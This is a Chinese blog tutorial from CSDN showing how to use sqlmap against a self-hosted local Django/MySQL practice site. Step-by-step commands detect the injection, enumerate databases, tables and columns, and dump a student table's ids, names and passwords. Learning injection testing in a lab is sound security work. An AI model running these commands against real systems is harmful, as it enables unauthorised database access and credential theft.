SQL注入：Sqlmap的简单使用-CSDN博客

本文链接：https://blog.csdn.net/wanngxue/article/details/99741654

本文详细介绍如何使用SQLMap进行SQL注入攻击，从搭建注入平台到获取数据库信息，包括检测漏洞、获取数据库列表、查询当前数据库、列出所有表及列，并导出数据列中的数据。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1、搭建注入平台
2、打开sqlmap输入python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” (-u参数指定目标注入地址)检测出存在可利用漏洞。
在这里插入图片描述
3、使用sqlmap注入获取数据库，python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” --dbs 列取数据库的所有库。如图查询到所有库的名称。

4、列出当前数据库使用参数。python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” --current-db，如下图查询出当前数据库为django_db。
在这里插入图片描述
5、查询django_db库中存在的所有表，python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” -D -D django_db --tables如下图查询出一个表。

6、列出django_db库中student表中的所有列，python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” -D django_db -T student --columns(-D dbname指定数据库名称、-T tablename：指定某数据表的名称、–columns：列出指定表上的所有列)。
在这里插入图片描述
7/导出三个数据列中所有的数据：python sqlmap.py -u “http://127.0.0.1:8000/mysql/?name=321552&pwd=31526” -D django_db -T student -C id,name,pwd --dump